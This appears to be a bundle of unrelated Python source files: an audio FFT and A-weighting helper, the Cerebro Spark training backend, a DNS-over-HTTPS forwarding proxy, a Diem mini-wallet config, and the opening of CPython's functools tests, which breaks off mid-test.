def getRecord(self):
"""record secToRecord seconds of audio."""
for i in range(self.chunksToRecord):
self.audio[i*self.BUFFERSIZE:(i+1)*self.BUFFERSIZE]=self.getAudio()
rec=self.audio
return rec
def continuousStart(self):
"""CALL THIS to start running forever."""
self.t = threading.Thread(target=self.record)
self.t.start()
def continuousEnd(self):
"""shut down continuous recording."""
self.threadsDieNow=True
### MATH ###
def downsample(self,data,mult):
"""Given 1D data, return the binned average."""
overhang=len(data)%mult
if overhang: data=data[:-overhang]
data=numpy.reshape(data,(len(data)/mult,mult))
data=numpy.average(data,1)
return data
def fft(self,data=None):
if data==None:
data=self.audio.flatten()
left,right=numpy.split(numpy.abs(numpy.fft.fft(data)),2)
ys=numpy.add(left,right[::-1])
# Determine FFT frequencies.
xs = (1.*self.RATE/len(ys))*numpy.arange(0,len(ys))
return xs,ys
def level(self,data=None):
if data==None:
data=self.audio.flatten()
# Calculate magnitude of FFT.
X = numpy.abs(numpy.fft.fft(data))
# Add offset to prevent taking the log of zero.
X[X == 0] = 1e-17
# Retain frequencies below Nyquist rate.
f = (1.*self.RATE/len(X))*numpy.arange(0,len(X))
ind = f<self.RATE/2.; f = f[ind]; X = X[ind]
# Apply A-weighting filter.
A = self.filterA(f)
X = A*X
# Estimate dBA value using Parseval's relation.
totalEnergy = numpy.sum(X**2)/len(X)
meanEnergy = totalEnergy/((1./self.RATE)*len(X))
dBA = 10.*numpy.log10(meanEnergy)+self.C
# Estimate decibel level (for visualization).
X = 20.*numpy.log10(numpy.abs(X))
return f, X, dBA
def filterA(self,f):
# FILTERA Generates an A-weighting filter.
# FILTERA Uses a closed-form expression to generate
# an A-weighting filter for arbitary frequencies.
#
# Author: Douglas R. Lanman, 11/21/05
# Define filter coefficients.
# See: http://www.beis.de/Elektronik/AudioMeasure/
# WeightingFilters.html#A-Weighting
c1 = 3.5041384e16
c2 = 20.598997**2
c3 = 107.65265**2
c4 = 737.86223**2
c5 = 12194.217**2
# Evaluate A-weighting filter.
f[f == 0] = 1e-17;
f = f**2
num = c1*f**4
den = ((c2+f)**2)*(c3+f)*(c4+f)*((c5+f)**2)
A = num/den
return A
### VISUALIZATION ###
def plotAudio(self):
"""open a matplotlib popup window showing audio data."""
pylab.plot(self.audio.flatten())
pylab.show()
|
backend.py
|
# Copyright 2020 Supun Nakandala, Yuhao Zhang, and Arun Kumar. All Rights Reserved.
# Copyright 2019 Uber Technologies, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
import io
import math
import os
import threading
import time
import gc
import inspect
import datetime
import h5py
import numpy as np
import pyspark
import tensorflow as tf
from six.moves import queue
from . import service_driver, service_task, util
from .. import constants
from .. import timeout, settings as spark_settings, secret, host_hash, job_id
from ..backend import Backend
from ...commons.util import patch_hugginface_layer_methods
from ...commons.constants import exit_event
PETASTORM_HDFS_DRIVER = constants.PETASTORM_HDFS_DRIVER
TOTAL_BUFFER_MEMORY_CAP_GIB = constants.TOTAL_BUFFER_MEMORY_CAP_GIB
BYTES_PER_GIB = constants.BYTES_PER_GIB
def default_num_workers():
spark_context = pyspark.SparkContext._active_spark_context
return spark_context.defaultParallelism
class KerasStepCounter(tf.keras.callbacks.Callback):
"""Helper callback to count the number of step in sub-epoch training"""
def __init__(self):
self.counter = 0
def on_train_batch_begin(self, batch, logs={}):
self.counter += 1
def on_test_batch_begin(self, batch, logs={}):
self.counter += 1
def get_step_count(self):
return self.counter
class SparkBackend(Backend):
"""Spark backend implementing Cerebro model hopping
:param spark_context: Spark context
:param num_workers: Number of Cerebro workers. Defaults to `spark.default.parallelism`.
:param start_timeout: Timeout for Spark tasks to spawn, register and start running the code, in seconds.
If it is not set as well, defaults to 600 seconds.
:param disk_cache_size_gb: Size of the disk data cache in GBs (default 10GB).
:param data_readers_pool_type: Data readers pool type ('process' or 'thread') (default 'thread')
:param num_data_readers: Number of data readers (default 10)
:param nics: List of NIC names, will only use these for communications. If None is specified, use any
available networking interfaces (default None)
:param verbose: Debug output verbosity (0-2). Defaults to 1.
"""
def __init__(self, spark_context=None, num_workers=None, start_timeout=600, disk_cache_size_gb=10,
data_readers_pool_type='thread', num_data_readers=10,
nics=None, verbose=1):
tmout = timeout.Timeout(start_timeout,
message='Timed out waiting for {activity}. Please check that you have '
'enough resources to run all Cerebro processes. Each Cerebro '
'process runs in a Spark task. You may need to increase the '
'start_timeout parameter to a larger value if your Spark resources '
'are allocated on-demand.')
settings = spark_settings.Settings(verbose=verbose,
key=secret.make_secret_key(),
timeout=tmout,
disk_cache_size_bytes=disk_cache_size_gb * constants.BYTES_PER_GIB,
data_readers_pool_type=data_readers_pool_type,
num_data_readers=num_data_readers,
nics=nics)
if spark_context is None:
spark_context = pyspark.SparkContext._active_spark_context
if spark_context is None:
raise Exception('Could not find an active SparkContext, are you '
'running in a PySpark session?')
self.spark_context = spark_context
if num_workers is None:
num_workers = spark_context.defaultParallelism
if settings.verbose >= 1:
print('CEREBRO => Time: {}, Running {} Workers (inferred from spark.default.parallelism)'.format(
datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"), num_workers))
else:
if settings.verbose >= 1:
print('CEREBRO => Time: {}, Running {} Workers'.format(datetime.datetime.now().strftime(
"%Y-%m-%d %H:%M:%S"), num_workers))
settings.num_workers = num_workers
self.settings = settings
self.workers_initialized = False
self.task_clients = None
self.driver = None
self.driver_client = None
self.spark_job_group = None
self.data_loaders_initialized = False
self.rand = np.random.RandomState(constants.RANDOM_SEED)
def initialize_workers(self):
"""Initializes Cerebro workers"""
result_queue = queue.Queue(1)
spark_job_group = 'cerebro.spark.run.%d' % job_id.next_job_id()
driver = service_driver.SparkDriverService(self.settings.num_workers, self.settings.key, self.settings.nics)
driver_client = service_driver.SparkDriverClient(driver.addresses(), self.settings.key, self.settings.verbose)
_make_spark_thread(self.spark_context, spark_job_group, driver, result_queue, self.settings)
driver.wait_for_initial_registration(self.settings.timeout)
if self.settings.verbose >= 2:
print('CEREBRO => Time: {}, Initial Spark task registration is complete'.format(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")))
task_clients = [service_task.SparkTaskClient(index,
driver.task_addresses_for_driver(index),
self.settings.key, self.settings.verbose) for index in
range(self.settings.num_workers)]
for task_client in task_clients:
task_client.notify_initial_registration_complete()
# setting local index for each task on the corresponding worker for GPU pinning (if needed)
host_hashes = driver.task_host_hash_indices()
for host_hash in host_hashes:
for i, task_index in enumerate(host_hashes[host_hash]):
task_clients[task_index].set_local_task_index(i)
self.driver = driver
self.driver_client = driver_client
self.task_clients = task_clients
self.spark_job_group = spark_job_group
self.workers_initialized = True
def initialize_data_loaders(self, store, schema_fields):
"""
:param store:
:param dataset_idx:
:param schema_fields:
"""
if self.workers_initialized:
remote_store = store.to_remote(self.spark_job_group, None)
shard_count = self._num_workers()
_, _, _, avg_row_size = util.get_simple_meta_from_parquet(store, schema_fields, None)
data_readers_fn = _data_readers_fn(remote_store, shard_count, schema_fields, avg_row_size,
self.settings.disk_cache_size_bytes,
self.settings.data_readers_pool_type, self.settings.num_data_readers)
for task_client in self.task_clients:
task_client.initialize_data_loaders(store.prefix_path, data_readers_fn)
self.data_loaders_initialized = False
else:
raise Exception('Spark tasks not initialized for Cerebro. Please run SparkBackend.initialize_workers() '
'first!')
def train_for_one_epoch(self, models, store, feature_cols, label_cols, is_train=True):
mode = "Training"
if not is_train:
mode = "Validation"
if self.settings.verbose >= 1:
print('CEREBRO => Time: {}, Starting EPOCH {}'.format(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"), mode))
sub_epoch_trainers = []
for model in models:
if type(store) == dict:
a_store = store[model.getRunId()]
else:
a_store = store
if type(feature_cols) == dict:
a_feature_col = feature_cols[model.getRunId()]
else:
a_feature_col = feature_cols
if type(label_cols) == dict:
a_label_col = label_cols[model.getRunId()]
else:
a_label_col = label_cols
sub_epoch_trainers.append(_get_remote_trainer(model, self, a_store, None, a_feature_col, a_label_col, is_train, self.settings.verbose))
model_worker_pairs = [(i, j) for i in range(len(models)) for j in range(self._num_workers())]
# take a random ordering
self.rand.shuffle(model_worker_pairs)
model_states = {i: False for i in range(len(models))}
worker_states = {i: False for i in range(self._num_workers())}
model_on_worker = [-1 for _ in range(self._num_workers())]
model_results = {model.getRunId(): None for model in models}
model_sub_epoch_steps = {model.getRunId(): None for model in models}
while not exit_event.is_set() and len(model_worker_pairs) > 0:
for w in range(self._num_workers()):
# worker idle
if not worker_states[w]:
m = _get_runnable_model(w, model_worker_pairs, model_states, is_train)
if m != -1:
# runnable model found
if self.settings.verbose >= 1:
print('CEREBRO => Time: {}, Scheduling Model: {}, on Worker: {}'.format(
datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"), models[m].getRunId(), w))
if type(store) == dict:
a_store = store[models[m].getRunId()]
else:
a_store = store
self.task_clients[w].execute_sub_epoch(
fn=sub_epoch_trainers[m], store_prefix_path=a_store.prefix_path, train=is_train, initial_epoch=models[m].getEpochs())
model_states[m] = True
worker_states[w] = True
model_on_worker[w] = m
if self.settings.verbose >= 1:
print('CEREBRO => Time: {}, Scheduled Model: {}, on Worker: {}'.format(
datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"), models[m].getRunId(), w))
else:
m = model_on_worker[w]
if m != -1:
status = self.task_clients[w].sub_epoch_completed()
if status.flag:
# sub-epoch completed
model_worker_pairs.remove((m, w))
model_states[m] = False
worker_states[w] = False
model_on_worker[w] = -1
if status.sub_epoch_result['status'] == 'FAILED':
# Application Error
self.teardown_workers()
raise Exception(status.sub_epoch_result['error'])
else:
res, steps = status.sub_epoch_result['result']
run_id = models[m].getRunId()
if model_results[run_id] is None:
model_results[run_id] = res
model_sub_epoch_steps[run_id] = [steps]
else:
for k in model_results[run_id]:
model_results[run_id][k].append(res[k][0])
model_sub_epoch_steps[run_id].append(steps)
if self.settings.verbose >= 1:
print('CEREBRO => Time: {}, Completed Model: {}, on Worker: {}'.format(
datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"), models[m].getRunId(), w))
exit_event.wait(self.settings.polling_period)
# incrementing the model epoch number
if is_train:
for model in models:
model.setEpochs(model.getEpochs() + 1)
# aggregating the model metrics
for run_id in model_results:
res = model_results[run_id]
steps = model_sub_epoch_steps[run_id]
for k in res:
res[k] = (np.sum([rk * steps[i] for i, rk in enumerate(res[k])]) / np.sum(steps))
if self.settings.verbose >= 2:
print('CEREBRO => Time: {}, Completed EPOCH {}'.format(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"), mode))
return model_results
def teardown_workers(self):
"""Teardown Spark tasks"""
for task_client in self.task_clients:
task_client.notify_workload_complete()
self.workers_initialized = False
self.data_loaders_initialized = False
def get_metadata_from_parquet(self, store, label_columns=['label'], feature_columns=['features']):
"""
Get metadata from the data in the persistent storage.
:param store:
:param label_columns:
:param feature_columns:
:return:
"""
return util.get_simple_meta_from_parquet(store, label_columns + feature_columns)
def prepare_data(self, store, dataset, validation, num_partitions=None, parquet_row_group_size_mb=8, dataset_idx=None):
"""
Prepare data by writing out into persistent storage
:param store: Cerebro storage object (e.g., LocalStorage, HDFSStorage).
:param dataset: Spark DataFrame.
:param validation: Fraction of validation data (e.g., 0.25) or name of the DataFrame column indicating validation.
:param num_partitions: Number of data partitions of the output. If None, will default to the current number of
input dataset partitions.
:param parquet_row_group_size_mb: Parquet row group size in MBs (default 8 MB) .
:param dataset_idx: Dataset index if storing multiple datasets in the same directory.
"""
return util.prepare_data(self._num_workers(), store, dataset, validation,
num_partitions=num_partitions, dataset_idx=dataset_idx,
compress_sparse = False,
parquet_row_group_size_mb=parquet_row_group_size_mb, verbose=self.settings.verbose)
def _num_workers(self):
"""
Get number of processes/tasks
:return:
"""
return self.settings.num_workers
def _get_runnable_model(worker, model_worker_pairs, model_states, is_train):
for m, w in model_worker_pairs:
# worker matches and model idle
if is_train:
if w == worker and not model_states[m]:
return m
else:
if w == worker:
return m
return -1
def _get_remote_trainer(estimator, backend, store, dataset_idx, feature_columns, label_columns, is_train=False, verbose=0):
run_id = estimator.getRunId()
if verbose >= 2:
print('CEREBRO => Time: {}, Collecting data metadata for Model: {}'.format(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"), run_id))
train_rows, val_rows, metadata, avg_row_size = \
util.get_simple_meta_from_parquet(store,
schema_cols=label_columns + feature_columns,
dataset_idx=dataset_idx)
estimator._check_params(metadata)
keras_utils = estimator._get_keras_utils()
# Checkpointing the model if it does not exist.
if not estimator._has_checkpoint(run_id):
remote_store = store.to_remote(run_id, dataset_idx)
if verbose >= 2:
print('CEREBRO => Time: {}, Checkpointing artifacts for Model: {}'.format(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"), run_id))
with remote_store.get_local_output_dir() as run_output_dir:
model = estimator._compile_model(keras_utils)
ckpt_file = os.path.join(run_output_dir, remote_store.checkpoint_filename)
model.save(ckpt_file)
remote_store.sync(run_output_dir)
if verbose >= 2:
print('CEREBRO => Time: {}, Initializing sub-epoch trainer for Model: {}'.format(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"), run_id))
trainer = sub_epoch_trainer(estimator, metadata, keras_utils, run_id, dataset_idx,
train_rows, val_rows, backend._num_workers())
return trainer
def _data_readers_fn(remote_store, shard_count, schema_fields, avg_row_size, cache_size_limit, pool_type, num_readers):
def _data_readers(index):
from petastorm import make_reader
PETASTORM_HDFS_DRIVER = constants.PETASTORM_HDFS_DRIVER
train_reader = make_reader(remote_store.train_data_path, shuffle_row_groups=False, num_epochs=1,
cur_shard=index,
shard_count=shard_count,
hdfs_driver=PETASTORM_HDFS_DRIVER,
schema_fields=schema_fields,
reader_pool_type=pool_type, workers_count=num_readers,
cache_type='local-disk',
cache_size_limit=cache_size_limit,
cache_row_size_estimate=avg_row_size,
cache_extra_settings={'cleanup': True})
if remote_store.val_data_path != '' and remote_store.val_data_path is not None:
val_reader = make_reader(remote_store.val_data_path, shuffle_row_groups=False, num_epochs=1,
cur_shard=index,
shard_count=shard_count,
hdfs_driver=PETASTORM_HDFS_DRIVER,
schema_fields=schema_fields,
reader_pool_type=pool_type, workers_count=num_readers,
cache_type='local-disk',
cache_size_limit=cache_size_limit,
cache_row_size_estimate=avg_row_size,
cache_extra_settings={'cleanup': True})
else:
val_reader = None
return train_reader, val_reader
return _data_readers
def _make_spark_thread(spark_context, spark_job_group, driver, result_queue,
settings):
"""Creates `settings.num_workers` Spark tasks in a parallel thread."""
def run_spark():
"""Creates `settings.num_workers` Spark tasks, each executing `_task_fn` and waits for them to terminate."""
try:
spark_context.setJobGroup(spark_job_group,
"Cerebro Spark Run",
interruptOnCancel=True)
procs = spark_context.range(0, end=settings.num_workers, numSlices=settings.num_workers)
# We assume that folks caring about security will enable Spark RPC
# encryption, thus ensuring that key that is passed here remains
# secret.
result = procs.barrier().mapPartitions(_make_mapper(driver.addresses(), settings)).collect()
result_queue.put(result)
except:
driver.notify_spark_job_failed()
raise
spark_thread = threading.Thread(target=run_spark)
spark_thread.start()
return spark_thread
def _make_mapper(driver_addresses, settings):
def _mapper(p):
try:
# https://www.google.com/search?q=keras+model+save+resource+temporarily+unavailable&oq=keras\
# +mode&aqs=chrome.0.69i59l2j69i57j69i59j69i60l3j69i65.3390j0j4&sourceid=chrome&ie=UTF-8
import os
os.environ['HDF5_USE_FILE_LOCKING'] = 'FALSE'
index = int(sum(p))
task = service_task.SparkTaskService(index, settings.key, settings.nics)
driver_client = service_driver.SparkDriverClient(driver_addresses, settings.key, settings.verbose)
driver_client.register_task(index, task.addresses(), host_hash.host_hash())
task.wait_for_initial_registration(settings.timeout)
task.wait_for_workload_completion()
yield 0
finally:
task.shutdown()
return _mapper
def sub_epoch_trainer(estimator, metadata, keras_utils, run_id, dataset_idx, train_rows, val_rows,
num_workers):
# Estimator parameters
label_columns = estimator.getLabelCols()
feature_columns = estimator.getFeatureCols()
user_callbacks = estimator.getCallbacks()
batch_size = estimator.getBatchSize()
custom_objects = estimator.getCustomObjects()
metrics_names = [name.__name__ if callable(name) else name for name in estimator.getMetrics()]
user_verbose = estimator.getVerbose()
# Model parameters
input_shapes, output_shapes = estimator.get_model_shapes()
output_names = estimator.getModel().output_names
input_names = estimator.getModel().input_names
floatx = tf.keras.backend.floatx()
make_dataset = keras_utils.make_dataset_fn(
feature_columns, label_columns, metadata,
input_shapes, output_shapes, input_names, output_names, batch_size)
fit_sub_epoch_fn = keras_utils.fit_sub_epoch_fn()
eval_sub_epoch_fn = keras_utils.eval_sub_epoch_fn()
transformation_fn = estimator.getTransformationFn()
# Utility functions
deserialize_keras_model = _deserialize_keras_model_fn()
pin_gpu = _pin_gpu_fn()
# Storage
store = estimator.getStore()
remote_store = store.to_remote(run_id, dataset_idx)
def train(data_reader, is_train, starting_epoch, local_task_index=0):
begin_time = time.time()
# Workaround for the issue with huggingface layers needing a python
# object as config (not a dict) and explicit definition of get_config method.
# We monkey patch the __init__ method get_config methods of such layers.
for k in custom_objects:
if issubclass(custom_objects[k], tf.keras.layers.Layer) and inspect.getmodule(custom_objects[k]).__name__.startswith('transformers.'):
patch_hugginface_layer_methods(custom_objects[k])
tf.keras.backend.set_floatx(floatx)
pin_gpu(local_task_index)
# Verbose mode 1 will print a progress bar.
verbose = user_verbose
with remote_store.get_local_output_dir() as run_output_dir:
step_counter_callback = KerasStepCounter()
callbacks = [step_counter_callback]
callbacks = callbacks + user_callbacks
ckpt_file = os.path.join(run_output_dir, remote_store.checkpoint_filename)
# restoring the model from the previous chckpoint
with tf.keras.utils.custom_object_scope(custom_objects):
model = deserialize_keras_model(
remote_store.get_last_checkpoint(), lambda x: tf.keras.models.load_model(x))
schema_fields = feature_columns + label_columns
if is_train:
train_data = make_dataset(data_reader, transformation_fn)
initialization_time = time.time() - begin_time
begin_time = time.time()
result = fit_sub_epoch_fn(starting_epoch, model, train_data, callbacks, verbose).history
training_time = time.time() - begin_time
begin_time = time.time()
result = {'train_' + name: result[name] for name in result}
model.save(ckpt_file)
else:
val_data = make_dataset(data_reader, transformation_fn)
initialization_time = time.time() - begin_time
begin_time = time.time()
result = eval_sub_epoch_fn(starting_epoch, model, val_data, callbacks, verbose)
training_time = time.time() - begin_time
begin_time = time.time()
result = [[x] for x in result]
result = {k: v for k, v in zip(['val_loss'] + ['val_' + name for name in metrics_names], result)}
del model
gc.collect()
tf.keras.backend.clear_session()
tf.compat.v1.reset_default_graph()
remote_store.sync(run_output_dir)
finalization_time = time.time() - begin_time
if verbose >= 1:
print('CEREBRO => Time: {}, Model: {}, Mode: {}, Initialization Time: {}, Training Time: {}, '
'Finalization Time: {}'.format(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
run_id, 'TRAIN' if is_train else 'VALID', initialization_time, training_time, finalization_time))
data_reader.reset()
return result, step_counter_callback.get_step_count()
return train
def _deserialize_keras_model_fn():
def deserialize_keras_model(model_bytes, load_model_fn):
"""Deserialize model from byte array encoded in base 64."""
bio = io.BytesIO(model_bytes)
with h5py.File(bio, 'r') as f:
return load_model_fn(f)
return deserialize_keras_model
def _pin_gpu_fn():
def fn(local_task_index):
gpus = tf.config.experimental.list_physical_devices('GPU')
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
if gpus:
tf.config.experimental.set_visible_devices(gpus[local_task_index], 'GPU')
return fn
def _pin_cpu_fn():
def fn():
os.environ['CUDA_VISIBLE_DEVICES'] = '-1'
tf.config.threading.set_inter_op_parallelism_threads(1)
tf.config.threading.set_intra_op_parallelism_threads(1)
return fn
|
doh-threadpool2.py
|
#!/usr/bin/env python3
import socket
import threading, queue
import requests, random
host = '127.0.0.1'
port = 5053
headers = {'accept': 'application/dns-message', 'content-type': 'application/dns-message'}
upstreams = ['https://1.1.1.1/dns-query', 'https://1.0.0.1/dns-query']
conns = []
queue = queue.Queue()
sock_lock = threading.Lock()
workers = 4
def main():
# Setup UDP server
print('Starting UDP server listening on: %s#%d' % (host, port))
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind((host, port))
# Connect to upstream servers
for upstream in upstreams:
print('Connecting to upstream server: %s' % (upstream))
conns.append(upstream_connect())
# Serve forever
try:
# Sub threads are responsible for forwarding requests
for _ in range(workers):
threading.Thread(target=worker, args=(sock,), daemon=True).start()
# Main thread is responsible for accepting requests
while True:
# Accept requests from a client
data, addr = sock.recvfrom(4096)
# Add request to queue
queue.put((data, addr))
except (KeyboardInterrupt, SystemExit):
pass
# Close upstream connections
for conn in conns:
upstream_close(conn)
# Close UDP server
sock.close()
def worker(sock):
while True:
# Retrieve request from the queue
data, addr = queue.get()
queue.task_done()
# Select upstream server to forward to
index = random.randrange(len(upstreams))
# Forward request to upstream server and get response
data = upstream_forward(upstreams[index], data, conns[index])
# Send reponse to client
with sock_lock:
sock.sendto(data, addr)
def upstream_connect():
"""
Create an upstream connection that will later be bound to a url.
Returns:
A requests session object
"""
# Create connection with default DNS message headers
session = requests.Session()
session.headers = headers
return session
def upstream_forward(url, data, conn):
"""
Send a DNS request over HTTPS using POST method.
Params:
url - url to forward queries to
data - normal DNS packet data to forward
conn - HTTPS connection to upstream DNS server
Returns:
A normal DNS response packet from upstream server
Notes:
Using DNS over HTTPS POST format as described here:
https://tools.ietf.org/html/draft-ietf-doh-dns-over-https-12
https://developers.cloudflare.com/1.1.1.1/dns-over-https/wireformat/
"""
return conn.post(url, data).content
def upstream_close(conn):
"""
Close an upstream connection.
Params:
conn - requests session object to close
"""
conn.close()
if __name__ == '__main__':
main()
|
config.py
|
# Copyright (c) The Diem Core Contributors
# SPDX-License-Identifier: Apache-2.0
from dataclasses import dataclass, field, asdict
from typing import Dict, Any, List, Tuple
from .client import RestClient
from .app import App, falcon_api
from .. import LocalAccount
from ... import offchain, testnet, jsonrpc, utils
import waitress, threading, logging, falcon, json
@dataclass
class ServerConfig:
host: str = field(default="localhost")
port: int = field(default_factory=offchain.http_server.get_available_port)
base_url: str = field(default="")
def __post_init__(self) -> None:
if not self.base_url:
self.base_url = f"http://localhost:{self.port}"
@dataclass
class AppConfig:
name: str = field(default="mini-wallet")
disable_events_api: bool = field(default=False)
account_config: Dict[str, Any] = field(default_factory=lambda: LocalAccount().to_dict())
child_account_configs: List[Dict[str, Any]] = field(default_factory=list)
server_conf: ServerConfig = field(default_factory=ServerConfig)
initial_amount: int = field(default=3_000_000_000_000)
initial_currency: str = field(default=testnet.TEST_CURRENCY_CODE)
child_account_size: int = field(default=2)
@property
def logger(self) -> logging.Logger:
return logging.getLogger(self.name)
@property
def account(self) -> LocalAccount:
return LocalAccount.from_dict(self.account_config)
@property
def child_accounts(self) -> List[LocalAccount]:
return list(map(LocalAccount.from_dict, self.child_account_configs))
@property
def server_url(self) -> str:
return self.server_conf.base_url
def create_client(self) -> RestClient:
self.logger.info("Creating client pointing to %s", self.server_url)
return RestClient(server_url=self.server_url, name="%s-client" % self.name).with_retry()
def setup_account(self, client: jsonrpc.Client) -> None:
self.logger.info("faucet: mint %s", self.account.account_address.to_hex())
faucet = testnet.Faucet(client)
faucet.mint(self.account.auth_key.hex(), self.initial_amount, self.initial_currency)
self.logger.info("rotate dual attestation info for %s", self.account.account_address.to_hex())
self.logger.info("set base url to: %s", self.server_url)
self.account.rotate_dual_attestation_info(client, self.server_url)
self.logger.info("generate child VASP accounts: %s", self.child_account_size)
child_account_initial_amount = int(self.initial_amount / (self.child_account_size + 1))
for i in range(self.child_account_size):
child = self.account.gen_child_vasp(client, child_account_initial_amount, self.initial_currency)
self.logger.info("generate child VASP account(%s): %s", i, child.to_dict())
self.child_account_configs.append(child.to_dict())
def serve(self, client: jsonrpc.Client, app: App) -> threading.Thread:
api: falcon.API = falcon_api(app, self.disable_events_api)
def serve() -> None:
self.logger.info("serving on %s:%s at %s", self.server_conf.host, self.server_conf.port, self.server_url)
waitress.serve(
api,
host=self.server_conf.host,
port=self.server_conf.port,
clear_untrusted_proxy_headers=True,
_quiet=True,
)
t = threading.Thread(target=serve, daemon=True)
t.start()
return t
def start(self, client: jsonrpc.Client) -> Tuple[App, threading.Thread]:
self.setup_account(client)
app = App(self.account, self.child_accounts, client, self.name, self.logger)
t = self.serve(client, app)
utils.wait_for_port(self.server_conf.port, host=self.server_conf.host)
return (app, t)
def __str__(self) -> str:
return json.dumps(asdict(self), indent=2)
|
test_functools.py
|
import abc
import builtins
import collections
import collections.abc
import copy
from itertools import permutations
import pickle
from random import choice
import sys
from test import support
import threading
import time
import typing
import unittest
import unittest.mock
from weakref import proxy
import contextlib
import functools
py_functools = support.import_fresh_module('functools', blocked=['_functools'])
c_functools = support.import_fresh_module('functools', fresh=['_functools'])
decimal = support.import_fresh_module('decimal', fresh=['_decimal'])
@contextlib.contextmanager
def replaced_module(name, replacement):
original_module = sys.modules[name]
sys.modules[name] = replacement
try:
yield
finally:
sys.modules[name] = original_module
def capture(*args, **kw):
"""capture all positional and keyword arguments"""
return args, kw
def signature(part):
""" return the signature of a partial object """
return (part.func, part.args, part.keywords, part.__dict__)
class MyTuple(tuple):
pass
class BadTuple(tuple):
def __add__(self, other):
return list(self) + list(other)
class MyDict(dict):
pass
class TestPartial:
def test_basic_examples(self):
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertTrue(callable(p))
self.assertEqual(p(3, 4, b=30, c=40),
((1, 2, 3, 4), dict(a=10, b=30, c=40)))
p = self.partial(map, lambda x: x*10)
self.assertEqual(list(p([1,2,3,4])), [10, 20, 30, 40])
def test_attributes(self):
p = self.partial(capture, 1, 2, a=10, b=20)
# attributes should be readable
self.assertEqual(p.func, capture)
self.assertEqual(p.args, (1, 2))
self.assertEqual(p.keywords, dict(a=10, b=20))
def test_argument_checking(self):
self.assertRaises(TypeError, self.partial) # need at least a func arg
try:
self.partial(2)()
except TypeError:
pass
else:
self.fail('First arg not checked for callability')
def test_protection_of_callers_dict_argument(self):
# a caller's dictionary should not be altered by partial
def func(a=10, b=20):
return a
d = {'a':3}
p = self.partial(func, a=5)
self.assertEqual(p(**d), 3)
self.assertEqual(d, {'a':3})
p(b=7)
self.assertEqual(d, {'a':3})
def test_kwargs_copy(self):
# Issue #29532: Altering a kwarg dictionary passed to a constructor
# should not affect a partial object after creation
d = {'a': 3}
p = self.partial(capture, **d)
self.assertEqual(p(), ((), {'a': 3}))
d['a'] = 5
self.assertEqual(p(), ((), {'a': 3}))
def test_arg_combinations(self):
# exercise special code paths for zero args in either partial
# object or the caller
p = self.partial(capture)
self.assertEqual(p(), ((), {}))
self.assertEqual(p(1,2), ((1,2), {}))
p = self.partial(capture, 1, 2)
self.assertEqual(p(), ((1,2), {}))
self.assertEqual(p(3,4), ((1,2,3,4), {}))
def test_kw_combinations(self):
# exercise special code paths for no keyword args in
# either the partial object or the caller
p = self.partial(capture)
self.assertEqual(p.keywords, {})
self.assertEqual(p(), ((), {}))
self.assertEqual(p(a=1), ((), {'a':1}))
p = self.partial(capture, a=1)
self.assertEqual(p.keywords, {'a':1})
self.assertEqual(p(), ((), {'a':1}))
self.assertEqual(p(b=2), ((), {'a':1, 'b':2}))
# keyword args in the call override those in the partial object
self.assertEqual(p(a=3, b=2), ((), {'a':3, 'b':2}))
def test_positional(self):
# make sure positional arguments are captured correctly
for args in [(), (0,), (0,1), (0,1,2), (0,1,2,3)]:
p = self.partial(capture, *args)
expected = args + ('x',)
got, empty = p('x')
self.assertTrue(expected == got and empty == {})
def test_keyword(self):
# make sure keyword arguments are captured correctly
for a in ['a', 0, None, 3.5]:
p = self.partial(capture, a=a)
expected = {'a':a,'x':None}
empty, got = p(x=None)
self.assertTrue(expected == got and empty == ())
def test_no_side_effects(self):
# make sure there are no side effects that affect subsequent calls
p = self.partial(capture, 0, a=1)
args1, kw1 = p(1, b=2)
self.assertTrue(args1 == (0,1) and kw1 == {'a':1,'b':2})
args2, kw2 = p()
self.assertTrue(args2 == (0,) and kw2 == {'a':1})
def test_error_propagation(self):
def f(x, y):
x / y
self.assertRaises(ZeroDivisionError, self.partial(f, 1, 0))
self.assertRaises(ZeroDivisionError, self.partial(f, 1), 0)
self.assertRaises(ZeroDivisionError, self.partial(f), 1, 0)
self.assertRaises(ZeroDivisionError, self.partial(f, y=0), 1)
def test_weakref(self):
f = self.partial(int, base=16)
p = proxy(f)
self.assertEqual(f.func, p.func)
f = None
self.assertRaises(ReferenceError, getattr, p, 'func')
def test_with_bound_and_unbound_methods(self):
data = list(map(str, range(10)))
join = self.partial(str.join, '')
self.assertEqual(join(data), '0123456789')
join = self.partial(''.join)
self.assertEqual(join(data), '0123456789')
def test_nested_optimization(self):
partial = self.partial
inner = partial(signature, 'asdf')
nested = partial(inner, bar=True)
flat = partial(signature, 'asdf', bar=True)
self.assertEqual(signature(nested), signature(flat))
def test_nested_partial_with_attribute(self):
# see issue 25137
partial = self.partial
def foo(bar):
return bar
p = partial(foo, 'first')
p2 = partial(p, 'second')
p2.new_attr = 'spam'
self.assertEqual(p2.new_attr, 'spam')
def test_repr(self):
args = (object(), object())
args_repr = ', '.join(repr(a) for a in args)
kwargs = {'a': object(), 'b': object()}
kwargs_reprs = ['a={a!r}, b={b!r}'.format_map(kwargs),
'b={b!r}, a={a!r}'.format_map(kwargs)]
if self.partial in (c_functools.partial, py_functools.partial):
name = 'functools.partial'
else:
name = self.partial.__name__
f = self.partial(capture)
self.assertEqual(f'{name}({capture!r})', repr(f))
f = self.partial(capture, *args)
